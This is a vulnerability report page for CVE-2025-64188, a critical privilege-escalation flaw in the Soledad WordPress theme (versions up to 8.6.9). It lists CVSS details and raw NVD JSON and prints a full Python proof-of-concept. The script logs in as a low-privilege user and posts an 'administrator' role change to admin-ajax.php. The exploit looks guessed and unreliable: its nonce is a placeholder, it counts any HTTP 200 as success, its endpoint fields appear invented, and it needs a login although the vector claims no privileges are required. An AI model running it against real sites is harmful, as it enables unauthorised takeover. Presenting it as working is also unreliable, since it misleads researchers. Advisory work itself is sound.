Security Vulnerability Report
中文
CVE-2025-64188 CVSS 9.8 CRITICAL

CVE-2025-64188

Published: 2025-12-18 08:16:10
Last Modified: 2026-04-15 00:35:42

Description

Incorrect Privilege Assignment vulnerability in PenciDesign Soledad soledad allows Privilege Escalation.This issue affects Soledad: from n/a through <= 8.6.9.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Soledad <= 8.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64188 - Soledad Theme Privilege Escalation PoC # Target: WordPress site with Soledad theme <= 8.6.9 def exploit_soledad_privesc(target_url, username, password): """ Exploit Incorrect Privilege Assignment in Soledad theme Allows privilege escalation via theme options manipulation """ session = requests.Session() # Step 1: Login as low-privilege user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) # Step 2: Exploit privilege escalation via theme options # Target the theme's customizer or options endpoint options_url = f"{target_url}/wp-admin/admin-ajax.php" # Privilege escalation payload - modify user role or add admin privesc_data = { 'action': 'penci_soledad_options_save', 'nonce': 'exploit_nonce_here', # May need to extract valid nonce 'penci_user_role': 'administrator', 'option_page': 'penci_soledad_options' } resp = session.post(options_url, data=privesc_data) # Step 3: Verify privilege escalation if 'success' in resp.text or resp.status_code == 200: print("[+] Privilege escalation successful!") print("[+] User role may have been elevated to administrator") return True else: print("[-] Exploitation failed - check target and credentials") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://target.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_soledad_privesc(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64188", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:10.120", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in PenciDesign Soledad soledad allows Privilege Escalation.This issue affects Soledad: from n/a through <= 8.6.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/soledad/vulnerability/wordpress-soledad-theme-8-6-9-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}